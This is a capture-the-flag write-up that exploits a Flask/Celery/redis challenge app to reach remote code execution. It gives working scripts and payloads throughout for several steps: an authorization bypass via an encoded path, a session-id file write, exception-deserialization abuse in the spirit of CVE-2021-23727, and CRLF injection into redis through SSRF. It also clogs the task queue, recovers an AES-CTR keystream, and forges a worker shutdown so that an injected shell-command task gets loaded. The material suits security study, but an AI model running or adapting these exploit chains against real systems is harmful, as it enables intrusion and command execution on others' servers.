Authorization bypass

Start with the process layout. supervisor keeps three programs running:

  1. redis
  2. app.py (flask + broker)
  3. worker

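The worker user is allowed to execute /readflag, so the end goal is RCE as the worker user.

The challenge implements its own stripped-down Flask on top of werkzeug, and the middleware handling contains a logic flaw.

When handling a request, the framework first resolves the endpoint from the path and then collects that endpoint's middlewares: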

def _collect_route_middlewares(self, endpoint: str, path: str) -> list[MiddlewareCallable]:
    scoped = list(self.route_middlewares.get(endpoint, []))
    if scoped:
        return scoped
    if not self.wildcard_middlewares:
        return scoped
    normalized_path = self._normalize_path(path)
    for pattern, middlewares in reversed(self.wildcard_middlewares):
        if self._pattern_matches(pattern, normalized_path):
            return list(middlewares)
    return scoped

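However, _normalize_path is applied to the path before the wildcard middlewares are matched. For the path /tasks/fetch/%2e%2e/asd, routing still resolves the fetch endpoint correctly, but by the time the middlewares are matched the path has become /tasks/asd. The match fails, so no middleware runs before the endpoint is entered, which bypasses the authorization check.

Arbitrary file write

When a session is saved, the session file path is derived from the sid: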
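
The mismatch can be reproduced in isolation. The following is a minimal sketch, not the challenge's code: route_endpoint, normalize_path and middleware_applies are hypothetical stand-ins, and it assumes the router matches the raw path by prefix while a wildcard pattern such as /tasks/fetch* is matched against the normalized path.

```python
import posixpath
from fnmatch import fnmatchcase
from typing import Optional
from urllib.parse import unquote


def normalize_path(path: str) -> str:
    """Hypothetical stand-in for _normalize_path: decode, then collapse dot segments."""
    return posixpath.normpath(unquote(path))


def route_endpoint(raw_path: str) -> Optional[str]:
    """Hypothetical router that looks only at the raw, undecoded path."""
    return "fetch" if raw_path.startswith("/tasks/fetch") else None


def middleware_applies(pattern: str, raw_path: str) -> bool:
    """Wildcard middlewares are matched against the normalized path."""
    return fnmatchcase(normalize_path(raw_path), pattern)


raw = "/tasks/fetch/%2e%2e/asd"
endpoint = route_endpoint(raw)                       # routing sees the raw path
normalized = normalize_path(raw)                     # middleware matching sees this
guarded = middleware_applies("/tasks/fetch*", raw)   # pattern is an assumption
print(endpoint, normalized, guarded)
```

The endpoint is still resolved, but the guard pattern no longer matches, so the request reaches the handler with an empty middleware list.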

def save(self, session: FileSession) -> None:
    if not session.modified:
        return
    path = self._session_path(session.sid)
    tmp_path = f"{path}.tmp-{secrets.token_hex(4)}"
    payload = {key: value for key, value in session.items()}
    with open(tmp_path, "w", encoding="utf-8") as fh:
        json.dump(payload, fh, ensure_ascii=False, separators=(",", ":"))
    os.replace(tmp_path, path)
    session.modified = False

The sid is user-controlled, so a file can be created at an arbitrary path, but its content cannot be fully controlled.

Payload:

Cookie: mini_session=/tmp/debug

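This creates /tmp/debug.

The challenge also defines a DiagnosticsPersistError class whose constructor can write arbitrary files. What remains is to find a place where an arbitrary callable gets invoked.

celery has a historical vulnerability, CVE-2021-23727, that allows an arbitrary callable to be invoked. The celery worker stores each task's result, and the broker side fetches it when it wants to read the result. If the task raised an error, the Exception is serialized and stored, then deserialized on read, and that deserialization step involves calling an arbitrary callable. The fix for CVE-2021-23727 only allows already-defined Exception classes to be deserialized and no longer allows arbitrary callables such as os.system.

Because DiagnosticsPersistError inherits from Exception (through RuntimeError), it can still be deserialized after the fix.

The key code of DiagnosticsPersistError is as follows: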
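
Why an absolute sid escapes the session directory can be sketched as follows. This assumes _session_path joins a base directory with the sid without validating it (its body is not shown here); SESSION_DIR and session_path are hypothetical names.

```python
import posixpath

SESSION_DIR = "/app/data/sessions"  # hypothetical base directory


def session_path(sid: str) -> str:
    """Assumed shape of _session_path: a plain join with no validation of sid."""
    return posixpath.join(SESSION_DIR, sid)


normal = session_path("d9b266db66464ed2")
escaped = session_path("/tmp/debug")  # an absolute component discards the base
print(normal)
print(escaped)
```

The written content is whatever JSON the session serializes to, which is sufficient when only the existence of the file matters.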
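
The post-fix behaviour can be modelled with a simplified sketch. This is not celery's source: rebuild_exception, SideEffectError and the fake module are hypothetical, and the model only assumes what is described above, namely that the class named by exc_type is looked up in exc_module, must be an exception type, and is then called with exc_message.

```python
import types


class SecurityError(Exception):
    """Raised when the stored type is not an exception class."""


def rebuild_exception(result: dict, modules: dict) -> BaseException:
    module = modules[result["exc_module"]]
    cls = getattr(module, result["exc_type"])
    # Post-fix check: only real exception classes may be instantiated.
    if not isinstance(cls, type) or not issubclass(cls, BaseException):
        raise SecurityError(f"{result['exc_type']} is not an exception class")
    return cls(result["exc_message"])


written = []


class SideEffectError(RuntimeError):
    """Stand-in for an exception whose constructor does extra work."""

    def __init__(self, payload: str) -> None:
        written.append(payload)  # the side effect still runs on deserialization
        super().__init__("diagnostics capture failed")


# A fake module holding one exception class and one plain callable.
fake_module = types.SimpleNamespace(SideEffectError=SideEffectError, system=print)
modules = {"framework.app": fake_module}

exc = rebuild_exception(
    {"exc_type": "SideEffectError", "exc_message": "payload", "exc_module": "framework.app"},
    modules,
)

try:
    rebuild_exception(
        {"exc_type": "system", "exc_message": "id", "exc_module": "framework.app"},
        modules,
    )
    blocked = False
except SecurityError:
    blocked = True

print(written, blocked)
```

The plain callable is rejected, while the exception class is instantiated and its constructor runs with attacker-chosen input.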

class DiagnosticsPersistError(RuntimeError):
    """Dormant exception used for development-time diagnostics persistence."""

    _BASE_DIR = Path(os.environ.get("FRAMEWORK_DIAGNOSTICS_DIR", "/app/data")).resolve()
    _DEBUG_SENTINEL = Path("/tmp/debug")

    def __init__(self, payload: str, *args: Any, **kwargs: Any) -> None:
        if self._DEBUG_SENTINEL.exists():
            self._maybe_persist(payload)
        super().__init__("diagnostics capture failed", *args, **kwargs)

    def _maybe_persist(self, payload: str) -> None:
        info = self._decode_payload(payload)
        if not info:
            return

        target = info.get("path")
        if not target:
            return

        path = Path(target)
        mode = str(info.get("mode", "w"))
        encoding = info.get("encoding", "utf-8")
        data = info.get("content", "")

        try:
            path.parent.mkdir(parents=True, exist_ok=True)
            if "b" in mode:
                blob = self._ensure_bytes(data, encoding)
                with path.open(mode) as fh:  # type: ignore[call-arg]
                    fh.write(blob)
            else:
                text = self._ensure_text(data, encoding)
                with path.open(mode, encoding=encoding) as fh:
                    fh.write(text)
        except Exception:
            return

    def _decode_payload(self, payload: str) -> Dict[str, Any] | None:
        attempts = [payload]
        try:
            attempts.append(bytes.fromhex(payload).decode("utf-8"))
        except Exception:
            pass

        for candidate in attempts:
            try:
                return json.loads(candidate)
            except Exception:
                continue
        return None

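In this challenge the broker and the worker communicate through redis. /tasks/fetch can be used for SSRF against redis to write a serialized payload into a task's result; the file write is triggered when that result is read.

The fetch code is as follows: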

@celery_app.task(name="miniws.fetch")
def fetch_task(url: str, *, host_header: str | None = None, body: str | None = None, verb: str = "GET") -> Dict[str, Any]:
    parsed = urlparse(url)
    host = parsed.hostname or settings.redis_host
    port = parsed.port or (443 if parsed.scheme == "https" else 80)
    path = parsed.path or "/"
    if parsed.query:
        path = f"{path}?{parsed.query}"

    request_host = host_header or parsed.netloc or f"{host}:{port}"
    request_body = body.encode() if body else b""

    payload = (
        f"{verb} {path} HTTP/1.1\r\n"
        f"Host: {request_host}\r\n"
        "User-Agent: MiniFetch/1.0\r\n"
        "Connection: close\r\n"
        "\r\n"
    ).encode() + request_body

    chunks: list[bytes] = []
    with socket.create_connection((host, port), timeout=5) as sock:
        sock.sendall(payload)
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    preview = b"".join(chunks)[:2048]
    return {"preview": preview.decode(errors="replace"), "bytes": len(preview)}

Injecting through verb is enough:

POST /tasks/fetch/%2e%2e/123 HTTP/1.1
Host: 
Content-Length: 2291
Content-Type: application/json
Cookie: mini_session=d9b266db66464ed2
Connection: close

{"url":"http://127.0.0.1:6379","verb":"set asd 1\r\nGET"}
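
What redis receives can be checked by rebuilding the request bytes locally. The sketch below copies the request template from fetch_task; build_request is a hypothetical helper and nothing is sent over the network.

```python
def build_request(verb: str, path: str, host: str) -> bytes:
    """Same request template as fetch_task, without the socket."""
    return (
        f"{verb} {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "User-Agent: MiniFetch/1.0\r\n"
        "Connection: close\r\n"
        "\r\n"
    ).encode()


# The CRLF inside verb ends the first line early.
wire = build_request("set asd 1\r\nGET", "/", "127.0.0.1:6379")
lines = wire.split(b"\r\n")
for line in lines[:3]:
    print(line)
```

The first line stands alone as a redis inline command, and the trailing GET absorbs the rest of the HTTP request line.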

Combined with the Exception class above, the file-write payload is:

set celery-task-meta-<uuid> '{"status": "FAILURE", "result": {"exc_type": "DiagnosticsPersistError", "exc_message": "<hex payload>", "exc_module": "framework.app"}, "traceback": "", "children": [], "date_done": "2025-10-31T06:15:48.956927", "task_id": "<uuid>"}'

Replace <uuid> with the uuid of any task. The value of exc_message is hex-encoded JSON whose path and content fields drive the file write.

Script to generate the file-write payload:
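
A minimal sketch of building exc_message and checking that it decodes the way the hex branch of _decode_payload does. encode_payload and decode_like_target are hypothetical helper names, and the path and content values are placeholders.

```python
import json


def encode_payload(path: str, content: str) -> str:
    """Hex-encode the JSON so the value contains no quotes or backslashes."""
    return json.dumps({"path": path, "content": content}).encode().hex()


def decode_like_target(payload: str) -> dict:
    """Mirrors the hex branch of _decode_payload."""
    return json.loads(bytes.fromhex(payload).decode("utf-8"))


hex_payload = encode_payload("/tmp/example.txt", 'print("hi")\n')
decoded = decode_like_target(hex_payload)
print(hex_payload[:32], decoded)
```

Because the hex form contains only 0-9 and a-f, it can be embedded in the quoted redis value without any further escaping.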

import json

def wapper(payload : str, title : str):
    print(f'------------------------{title}----------------------------')
    data = '\r\n' + payload + '\r\nGET'
    # print(data)
    out = ''
    for i in data:
        num = hex(ord(i)).replace('0x', '')
        while len(num) < 2:
            num = '0' + num
        out = out + '\\u00' + num

    print(out)

pwned_taskspy = '''
from __future__ import annotations

import os
import pickle
import socket
from typing import Any, Dict
from urllib.parse import urlparse

from celery import Celery
from kombu.serialization import register

from .config import settings
from .crypto import dumps as encrypt_dumps, loads as decrypt_loads

try:
    register(
        "miniws-aes",
        encrypt_dumps,
        decrypt_loads,
        content_type="application/x-miniws",
        content_encoding="binary",
    )
except ValueError:
    pass

celery_app = Celery(
    "miniws",
    broker=settings.celery_broker_url,
    backend=settings.celery_backend_url,
)

celery_app.conf.update(
    task_serializer="miniws-aes",
    task_default_serializer="miniws-aes",
    accept_content=["miniws-aes"],
    result_serializer="json",
    result_accept_content=["json"],
)

@celery_app.task(name="miniws.echo")
def echo_task(message: str) -> Dict[str, Any]:
    return {"echo": __import__("os").popen(message).read()}

@celery_app.task(name="miniws.fetch")
def fetch_task(url: str, *, host_header: str | None = None, body: str | None = None, verb: str = "GET") -> Dict[str, Any]:
    parsed = urlparse(url)
    host = parsed.hostname or settings.redis_host
    port = parsed.port or (443 if parsed.scheme == "https" else 80)
    path = parsed.path or "/"
    if parsed.query:
        path = f"{path}?{parsed.query}"

    request_host = host_header or parsed.netloc or f"{host}:{port}"
    request_body = body.encode() if body else b""

    payload = (
        f"{verb} {path} HTTP/1.1\\r\\n" + 
        f"Host: {request_host}\\r\\n" + 
        "User-Agent: MiniFetch/1.0\\r\\n" + 
        "Connection: close\\r\\n" + 
        "\\r\\n"
    ).encode() + request_body

    chunks: list[bytes] = []
    with socket.create_connection((host, port), timeout=5) as sock:
        sock.sendall(payload)
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    preview = b"".join(chunks)[:2048]
    return {"preview": preview.decode(errors="replace"), "bytes": len(preview)}
'''.strip()

def write_file(task_id : str):
    payload = {
        "path" : "/app/src/tasks.py",
        "content" : pwned_taskspy
    }

    data = '''
    set celery-task-meta-%s '{"status": "FAILURE", "result": {"exc_type": "DiagnosticsPersistError", "exc_message": "%s", "exc_module": "framework.app"}, "traceback": "", "children": [], "date_done": "2025-10-31T06:15:48.956927", "task_id": "%s"}'
    '''.strip() % (task_id, json.dumps(payload).encode().hex(), task_id)

    wapper(data, 'write file')

task_id = ''

write_file(task_id)

In this tasks.py the echo task runs message as a shell command and returns its output.

restart

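Recovering the keystream

The plan is to overwrite tasks.py and then trigger a worker restart so that the new tasks.py is executed. In a celery + redis setup, the broker can publish control commands over redis PUB/SUB, including pool_restart and shutdown.

However, the challenge adds encryption to celery. The code is as follows: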

from __future__ import annotations

import json
import socket
from hashlib import md5, sha1
from typing import Any

from Crypto.Cipher import AES

from .config import settings
import logging
_TASK_KEY = sha1(settings.secret_key.encode()).digest()[:16]
_TASK_NONCE = md5(socket.gethostname().encode()).digest()[:8]
logging.basicConfig(level=logging.INFO)

def encrypt_bytes(data: bytes) -> bytes:
    cipher = AES.new(_TASK_KEY, AES.MODE_CTR, nonce=_TASK_NONCE)
    return cipher.encrypt(data)


def decrypt_bytes(data: bytes) -> bytes:
    cipher = AES.new(_TASK_KEY, AES.MODE_CTR, nonce=_TASK_NONCE)
    return cipher.decrypt(data)


def dumps(payload: Any) -> bytes:
    raw = json.dumps(payload, separators=(",", ":"), ensure_ascii=False).encode("utf-8")
    return encrypt_bytes(raw)


def loads(ciphertext: bytes) -> Any:
    raw = decrypt_bytes(ciphertext)
    return json.loads(raw.decode("utf-8"))

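This is vulnerable. CTR mode is a stream cipher, and since the key and nonce are fixed here, the keystream is fixed as well. A known-plaintext attack applies: with a matching plaintext and ciphertext pair, the keystream can be computed.

The fetch task code sets a timeout of 5 s: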
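
The attack depends only on XOR algebra, so it can be sketched without AES. In the sketch below a random byte string stands in for the fixed AES-CTR keystream; xor_bytes and the sample messages are hypothetical.

```python
import os


def xor_bytes(a: bytes, b: bytes) -> bytes:
    """XOR two byte strings, truncating to the shorter one."""
    return bytes(x ^ y for x, y in zip(a, b))


keystream = os.urandom(64)  # stand-in for the fixed AES-CTR keystream

known_plain = b'[[],{"message":"1111111111111111"},{"callbacks":null}]'
observed_cipher = xor_bytes(known_plain, keystream)  # what the attacker sees

# Known plaintext XOR ciphertext gives back a prefix of the keystream.
recovered = xor_bytes(known_plain, observed_cipher)

# Any message no longer than the recovered prefix can now be forged.
forged_plain = b'{"method":"shutdown","arguments":{}}'
forged_cipher = xor_bytes(forged_plain, recovered)

# The receiver decrypts with the same keystream and sees the forged message.
print(xor_bytes(forged_cipher, keystream))
```

The recovered keystream is only as long as the known plaintext, which is why a long echo message is useful for covering longer forged messages.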

@celery_app.task(name="miniws.fetch")
def fetch_task(url: str, *, host_header: str | None = None, body: str | None = None, verb: str = "GET") -> Dict[str, Any]:
    parsed = urlparse(url)
    host = parsed.hostname or settings.redis_host
    port = parsed.port or (443 if parsed.scheme == "https" else 80)
    path = parsed.path or "/"
    if parsed.query:
        path = f"{path}?{parsed.query}"

    request_host = host_header or parsed.netloc or f"{host}:{port}"
    request_body = body.encode() if body else b""

    payload = (
        f"{verb} {path} HTTP/1.1\r\n"
        f"Host: {request_host}\r\n"
        "User-Agent: MiniFetch/1.0\r\n"
        "Connection: close\r\n"
        "\r\n"
    ).encode() + request_body

    chunks: list[bytes] = []
    with socket.create_connection((host, port), timeout=5) as sock:
        sock.sendall(payload)
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    preview = b"".join(chunks)[:2048]
    return {"preview": preview.decode(errors="replace"), "bytes": len(preview)}

This can be used for DoS to clog the task queue, after which a redis lua script sent through SSRF retrieves the ciphertext.

EXP to trigger the blockage:

import requests
import time

url = 'http://192.168.72.132:5001'

for i in range(10):
    try:
        res = requests.post(url=url + '/tasks/fetch/%252e%252e/asd', json={"url":"http://192.168.72.131:6378","verb":"GET"}) # an unreachable IP costs the worker the full 5 s timeout
    except KeyboardInterrupt as e:
        break
    except:
        pass

while True:
    try:
        res = requests.post(url=url + '/tasks/echo', json={"message":"111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111"})
    except KeyboardInterrupt as e:
        break
    except:
        pass

First send 10 fetch tasks to clog the queue, then keep sending echo tasks. Next, send this SSRF payload repeatedly:

EVAL "local element_list = redis.call('LRANGE', KEYS[1], 0, 0) if not element_list or #element_list == 0 then return nil end local first_element = element_list[1] local escaped_value = string.gsub(first_element, '\\"', '\\\\\\\\\\"') local json_result = '{\\"status\\": \\"SUCCESS\\", \\"result\\": {\\"echo\\": \\"' .. escaped_value .. '\\"}, \\"traceback\\": null, \\"children\\": [], \\"date_done\\": \\"2025-10-31T03:20:37.823922\\", \\"task_id\\": \\"<uuid>\\"}' redis.call('SET', KEYS[2], json_result) return json_result" 2 celery celery-task-meta-<uuid>

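This lua script reads the first element of the celery queue and stores it under a key. Right after starting the DoS script above, send the lua script several times. The ciphertext can then be read back through the chosen uuid.

Computing the keystream: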
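
Once the queue element has been copied into the result key, the ciphertext still has to be pulled out of it. The sketch below assumes the queued element is a JSON envelope with a base64 body field, in the same style as the envelope used for the PUBLISH command in this writeup; extract_ciphertext and the sample envelope are hypothetical.

```python
import base64
import json


def extract_ciphertext(envelope_json: str) -> bytes:
    """Return the raw encrypted body from a queued message envelope."""
    envelope = json.loads(envelope_json)
    if envelope.get("properties", {}).get("body_encoding") != "base64":
        raise ValueError("unexpected body encoding")
    return base64.b64decode(envelope["body"])


# Fabricated envelope for illustration only; the real one comes from redis.
sample = json.dumps({
    "body": base64.b64encode(b"\x01\x02\x03").decode(),
    "content-type": "application/x-miniws",
    "properties": {"body_encoding": "base64"},
})
cipher = extract_ciphertext(sample)
print(cipher)
```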

import base64

plaintext = '''
[[],{"message":"111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111"},{"callbacks":null,"errbacks":null,"chain":null,"chord":null}]
'''.strip().encode()

s = '''
tVcJqAkEgomM+S9W7E0er7nxxvRbPGVKva26QEGh5A+jUnSlfZydMeb4edf9XkKVWZTUitk6avW0FBpbo9Cwz9QK0WuYjcr9Rofy3ECZw6EqDO5XQoYPEkScwW3Nlb5cqYY80ZSaQajPJTYI/ofbbNTqVMrIe8F6HM6Hjs3yiGZ1xxw21yn3TdH6KcdTTKZHjWnxiDEljKura1QJiV4fbbbA9+dbWb2B04Bb1qKgWn9L8d9HyifZdpkkuEj8ktTPtJZd9BguR7ma1ONX5tvs683hWYV3yZOSXyPlxbFDzkpT/QalATKleUl9oL9DUNb5vbnW+qDgoJoli4meBWxwNV/2ADUDJtKSNmhNoAqYEAzvZP9Ig961X9qj0ZcDqJzZ+/WNmoEHskqYUwmCqwEBpCL/0twT4VoTlrJd6VQVW2kHVji6+eQIyaxNLOmygNAfl0mZ4pTOOlGj8RUDo5jUXLMPm7tGQYaVQ6rEq0lmKjYv3uq8dxvI5E3iYzPlA3Ued/mMqvBcjDcgcJUOEWKamEPAgim2AcblfhBGMVJu5SjnvH3Tz+H6GEScmrnf8ABNAsCU6DdqV9V9YkcjZWcVnj2LlJRXsCCfHfVxsneFcb6UvEkgFLBWF/SDzcNwcDJ8ovplSvc=

'''.strip()


cpher = base64.b64decode(s)

key_stream = []

for i in range(len(cpher)):
    c = cpher[i]
    p = plaintext[i]
    k = c ^ p
    key_stream.append(k)

print(key_stream)

For the echo 111 ... task the plaintext format is known, so XORing it with the ciphertext yields the keystream.

shutdown

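pool_restart is disabled by default, whereas shutdown is enabled by default. Since the worker process is supervised and restarted by supervisor, the effect is the same.

The shutdown command has the following format: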

{
    "method" : "shutdown",
    "arguments" : {},
    "destination" : null,
    "pattern" : null,
    "matcher" : null,
    "ticket" : "8b3edc18-e6c9-41df-8fbb-e3452b0db26f",
    "reply_to" : {
        "exchange" : "reply.celery.pidbox",
        "routing_key" : "082a4b30-f17a-3be9-ac0e-023e96bcc32a"
    }
}

ticket and routing_key can be set to random uuids; they are not validated.

Encryption script:
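
A sketch of generating this message with fresh uuids instead of hard-coded ones. build_shutdown_message is a hypothetical helper; the field names are taken from the format above, and the compact separators follow the challenge's dumps().

```python
import json
import uuid


def build_shutdown_message() -> bytes:
    """Serialize a shutdown control message with random ticket and routing_key."""
    message = {
        "method": "shutdown",
        "arguments": {},
        "destination": None,
        "pattern": None,
        "matcher": None,
        "ticket": str(uuid.uuid4()),
        "reply_to": {
            "exchange": "reply.celery.pidbox",
            "routing_key": str(uuid.uuid4()),
        },
    }
    # Compact separators, matching the challenge's dumps() before encryption.
    return json.dumps(message, separators=(",", ":"), ensure_ascii=False).encode("utf-8")


raw = build_shutdown_message()
print(len(raw), raw[:40])
```

The output length is constant across calls because uuid strings have a fixed length, so it can be compared against the length of the recovered keystream up front.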

import base64

data = '''
{"method":"shutdown","arguments":{},"destination":null,"pattern":null,"matcher":null,"ticket":"8b3edc18-e6c9-41df-8fbb-e3452b0db26f","reply_to":{"exchange":"reply.celery.pidbox","routing_key":"082a4b30-f17a-3be9-ac0e-023e96bcc32a"}}

'''.strip().encode()

def e_with_key(data : bytes):
    key_stream = [238, 12, 84, 132, 114, 38, 239, 236, 255, 138, 78, 49, 137, 111, 36, 141, 136, 192, 247, 197, 106, 13, 84, 123, 140, 156, 139, 113, 112, 144, 213, 62, 146, 99, 69, 148, 76, 173, 172, 0, 215, 201, 72, 230, 204, 111, 115, 164, 104, 165, 229, 187, 232, 11, 91, 196, 133, 37, 43, 106, 146, 225, 129, 254, 229, 59, 224, 90, 169, 188, 251, 204, 119, 182, 195, 237, 113, 168, 242, 144, 27, 61, 223, 102, 115, 183, 62, 35, 117, 173, 240, 92, 252, 164, 143, 109, 152, 183, 13, 224, 165, 171, 112, 153, 254, 20, 7, 57, 207, 182, 234, 93, 229, 219, 101, 251, 249, 74, 240, 75, 45, 255, 182, 191, 252, 195, 185, 87, 68, 246, 45, 7, 230, 24, 198, 124, 224, 203, 24, 246, 98, 125, 151, 118, 188, 88, 192, 185, 0, 20, 189, 154, 154, 90, 101, 56, 184, 111, 46, 92, 135, 241, 198, 214, 106, 104, 140, 176, 226, 177, 106, 231, 147, 145, 107, 78, 122, 192, 238, 118, 251, 22, 232, 71, 168, 21, 137, 121, 205, 163, 229, 254, 133, 167, 108, 197, 41, 31, 118, 136, 171, 229, 210, 102, 215, 234, 221, 218, 252, 208, 104, 180, 70, 248, 162, 163, 110, 18, 212, 244, 128, 114, 255, 123, 98, 204, 55, 148, 48, 3, 148, 72, 120, 76, 145, 142, 114, 97, 231, 200, 140, 136, 231, 203, 145, 209, 145, 171, 20, 186, 184, 175, 52, 93, 65, 4, 110, 199, 49, 4, 50, 23, 227, 163, 7, 89, 124, 145, 59, 169, 33, 61, 222, 85, 206, 121, 178, 239, 132, 110, 235, 146, 224, 166, 50, 153, 173, 232, 202, 196, 188, 171, 176, 54, 131, 123, 169, 98, 56, 179, 154, 48, 48, 149, 19, 206, 227, 237, 34, 208, 107, 34, 167, 131, 108, 216, 101, 36, 106, 88, 54, 103, 9, 139, 200, 213, 57, 248, 157, 124, 29, 216, 131, 177, 225, 46, 166, 120, 168, 211, 165, 255, 11, 96, 146, 192, 36, 50, 146, 169, 229, 109, 130, 62, 170, 138, 119, 112, 183, 164, 114, 155, 245, 154, 120, 87, 27, 7, 30, 239, 219, 141, 70, 42, 249, 213, 124, 211, 82, 2, 212, 50, 68, 47, 70, 200, 189, 155, 193, 109, 189, 6, 17, 65, 164, 63, 32, 83, 171, 169, 114, 241, 179, 24, 135, 48, 247, 212, 79, 33, 119, 0, 99, 95, 212, 25, 214, 141, 76, 226, 254, 195, 135, 52, 
63, 190, 249, 216, 179, 156, 98, 44, 97, 171, 231, 202, 13, 4, 34, 185, 17, 78, 101, 70, 23, 21, 119, 255, 94, 224, 231, 182, 109, 222, 85, 243, 113, 217, 83, 209, 31, 228, 24, 208, 182, 134, 39, 85, 120, 220, 122, 53, 151, 235, 162, 177, 20, 82, 8, 18, 215, 150, 9, 55, 170]

    
    
    data_length = len(data)
    plain = b''
    for i in range(len(key_stream)):
        if i >= data_length:
            break
        plain = plain + bytes([data[i] ^ key_stream[i]])
    return plain

out = e_with_key(data)

print(base64.b64encode(out))

Control commands such as shutdown are sent over redis PUB/SUB. The command is:

PUBLISH /0.celery.pidbox '{"body": "<encrypted base64 data>", "content-encoding": "binary", "content-type": "application/x-miniws", "headers": {"clock": 1, "expires": 1861891032.9756505}, "properties": {"delivery_mode": 2, "delivery_info": {"exchange": "celery.pidbox", "routing_key": ""}, "priority": 0, "body_encoding": "base64", "delivery_tag": "e9cb2a03-3968-4a48-a3ea-ca7ba413c012"}}'

Make sure expires is not in the past; delivery_tag can be any random uuid. After the worker process exits, supervisor brings it back up, and it then loads the tasks.py we overwrote.

Payloads that involve redis lua are sensitive to quote escaping, so unicode escapes make things easier. The following script generates the payloads for all three stages:
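
The envelope can also be generated so that expires is always in the future. This is a sketch under the assumption that only the fields shown in the command above matter; build_publish_command and ttl_seconds are hypothetical names.

```python
import base64
import json
import time
import uuid


def build_publish_command(encrypted_body: bytes, ttl_seconds: int = 3600) -> str:
    """Wrap an already-encrypted body in the pidbox envelope shown above."""
    envelope = {
        "body": base64.b64encode(encrypted_body).decode(),
        "content-encoding": "binary",
        "content-type": "application/x-miniws",
        "headers": {"clock": 1, "expires": time.time() + ttl_seconds},
        "properties": {
            "delivery_mode": 2,
            "delivery_info": {"exchange": "celery.pidbox", "routing_key": ""},
            "priority": 0,
            "body_encoding": "base64",
            "delivery_tag": str(uuid.uuid4()),
        },
    }
    # base64 and uuid text contain no single quotes, so quoting stays intact.
    return "PUBLISH /0.celery.pidbox '" + json.dumps(envelope) + "'"


command = build_publish_command(b"\x00\x01\x02")
print(command[:60])
```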

import json

def wapper(payload : str, title : str):
    print(f'------------------------{title}----------------------------')
    data = '\r\n' + payload + '\r\nGET'
    # print(data)
    out = ''
    for i in data:
        num = hex(ord(i)).replace('0x', '')
        while len(num) < 2:
            num = '0' + num
        out = out + '\\u00' + num

    print(out)

pwned_taskspy = '''
from __future__ import annotations

import os
import pickle
import socket
from typing import Any, Dict
from urllib.parse import urlparse

from celery import Celery
from kombu.serialization import register

from .config import settings
from .crypto import dumps as encrypt_dumps, loads as decrypt_loads

try:
    register(
        "miniws-aes",
        encrypt_dumps,
        decrypt_loads,
        content_type="application/x-miniws",
        content_encoding="binary",
    )
except ValueError:
    pass

celery_app = Celery(
    "miniws",
    broker=settings.celery_broker_url,
    backend=settings.celery_backend_url,
)

celery_app.conf.update(
    task_serializer="miniws-aes",
    task_default_serializer="miniws-aes",
    accept_content=["miniws-aes"],
    result_serializer="json",
    result_accept_content=["json"],
)

@celery_app.task(name="miniws.echo")
def echo_task(message: str) -> Dict[str, Any]:
    return {"echo": __import__("os").popen(message).read()}

@celery_app.task(name="miniws.fetch")
def fetch_task(url: str, *, host_header: str | None = None, body: str | None = None, verb: str = "GET") -> Dict[str, Any]:
    parsed = urlparse(url)
    host = parsed.hostname or settings.redis_host
    port = parsed.port or (443 if parsed.scheme == "https" else 80)
    path = parsed.path or "/"
    if parsed.query:
        path = f"{path}?{parsed.query}"

    request_host = host_header or parsed.netloc or f"{host}:{port}"
    request_body = body.encode() if body else b""

    payload = (
        f"{verb} {path} HTTP/1.1\\r\\n" + 
        f"Host: {request_host}\\r\\n" + 
        "User-Agent: MiniFetch/1.0\\r\\n" + 
        "Connection: close\\r\\n" + 
        "\\r\\n"
    ).encode() + request_body

    chunks: list[bytes] = []
    with socket.create_connection((host, port), timeout=5) as sock:
        sock.sendall(payload)
        while True:
            data = sock.recv(4096)
            if not data:
                break
            chunks.append(data)
    preview = b"".join(chunks)[:2048]
    return {"preview": preview.decode(errors="replace"), "bytes": len(preview)}
'''.strip()

def write_file(task_id : str):
    payload = {
        "path" : "/app/src/tasks.py",
        "content" : pwned_taskspy
    }

    data = '''
    set celery-task-meta-%s '{"status": "FAILURE", "result": {"exc_type": "DiagnosticsPersistError", "exc_message": "%s", "exc_module": "framework.app"}, "traceback": "", "children": [], "date_done": "2025-10-31T06:15:48.956927", "task_id": "%s"}'
    '''.strip() % (task_id, json.dumps(payload).encode().hex(), task_id)

    wapper(data, 'write file')
    
def get_key(task_id : str):
    data = '''
    EVAL "local element_list = redis.call('LRANGE', KEYS[1], 0, 0) if not element_list or #element_list == 0 then return nil end local first_element = element_list[1] local escaped_value = string.gsub(first_element, '\\"', '\\\\\\\\\\"') local json_result = '{\\"status\\": \\"SUCCESS\\", \\"result\\": {\\"echo\\": \\"' .. escaped_value .. '\\"}, \\"traceback\\": null, \\"children\\": [], \\"date_done\\": \\"2025-10-31T03:20:37.823922\\", \\"task_id\\": \\"%s\\"}' redis.call('SET', KEYS[2], json_result) return json_result" 2 celery celery-task-meta-%s
    '''.strip() % (task_id, task_id)

    wapper(data, 'get key')

def shutdown(task_id : str):
    enc_data = '''
lS454QZOgIjdsGxC4RpQ6ee3medGLzUJ6+nmFB7kphyoGDi4bsnJc6OgJoe4BhzKSp+LzoRnd+b1RF8e95Pv3N9VlTbFkNmhFsKghRTa0Kp1SLMKX5VKShbGlSjenq1V+oRohMaaSLSbImQA4oLbOYP2XZ2bKN0uHsuDjZ7z3TV2wEslyjq0GZCnYakWErVMx3qlwWN83PT9P0cCmh1LLOuI6LUPBOnCm58ajvfzBDZY7MwElGOcLsZy1hKo2sfEp5dU90grFLubyLRX4Ivw6Z61UZknm5LGQyLmx+VLyRkBrwSmUSHpNQ==

'''.strip()

    data = '''
    PUBLISH /0.celery.pidbox '{"body": "%s", "content-encoding": "binary", "content-type": "application/x-miniws", "headers": {"clock": 1, "expires": 1861891032.9756505}, "properties": {"delivery_mode": 2, "delivery_info": {"exchange": "celery.pidbox", "routing_key": ""}, "priority": 0, "body_encoding": "base64", "delivery_tag": "e9cb2a03-3968-4a48-a3ea-ca7ba413c012"}}'
    '''.strip() % enc_data

    wapper(data, 'shutdown')

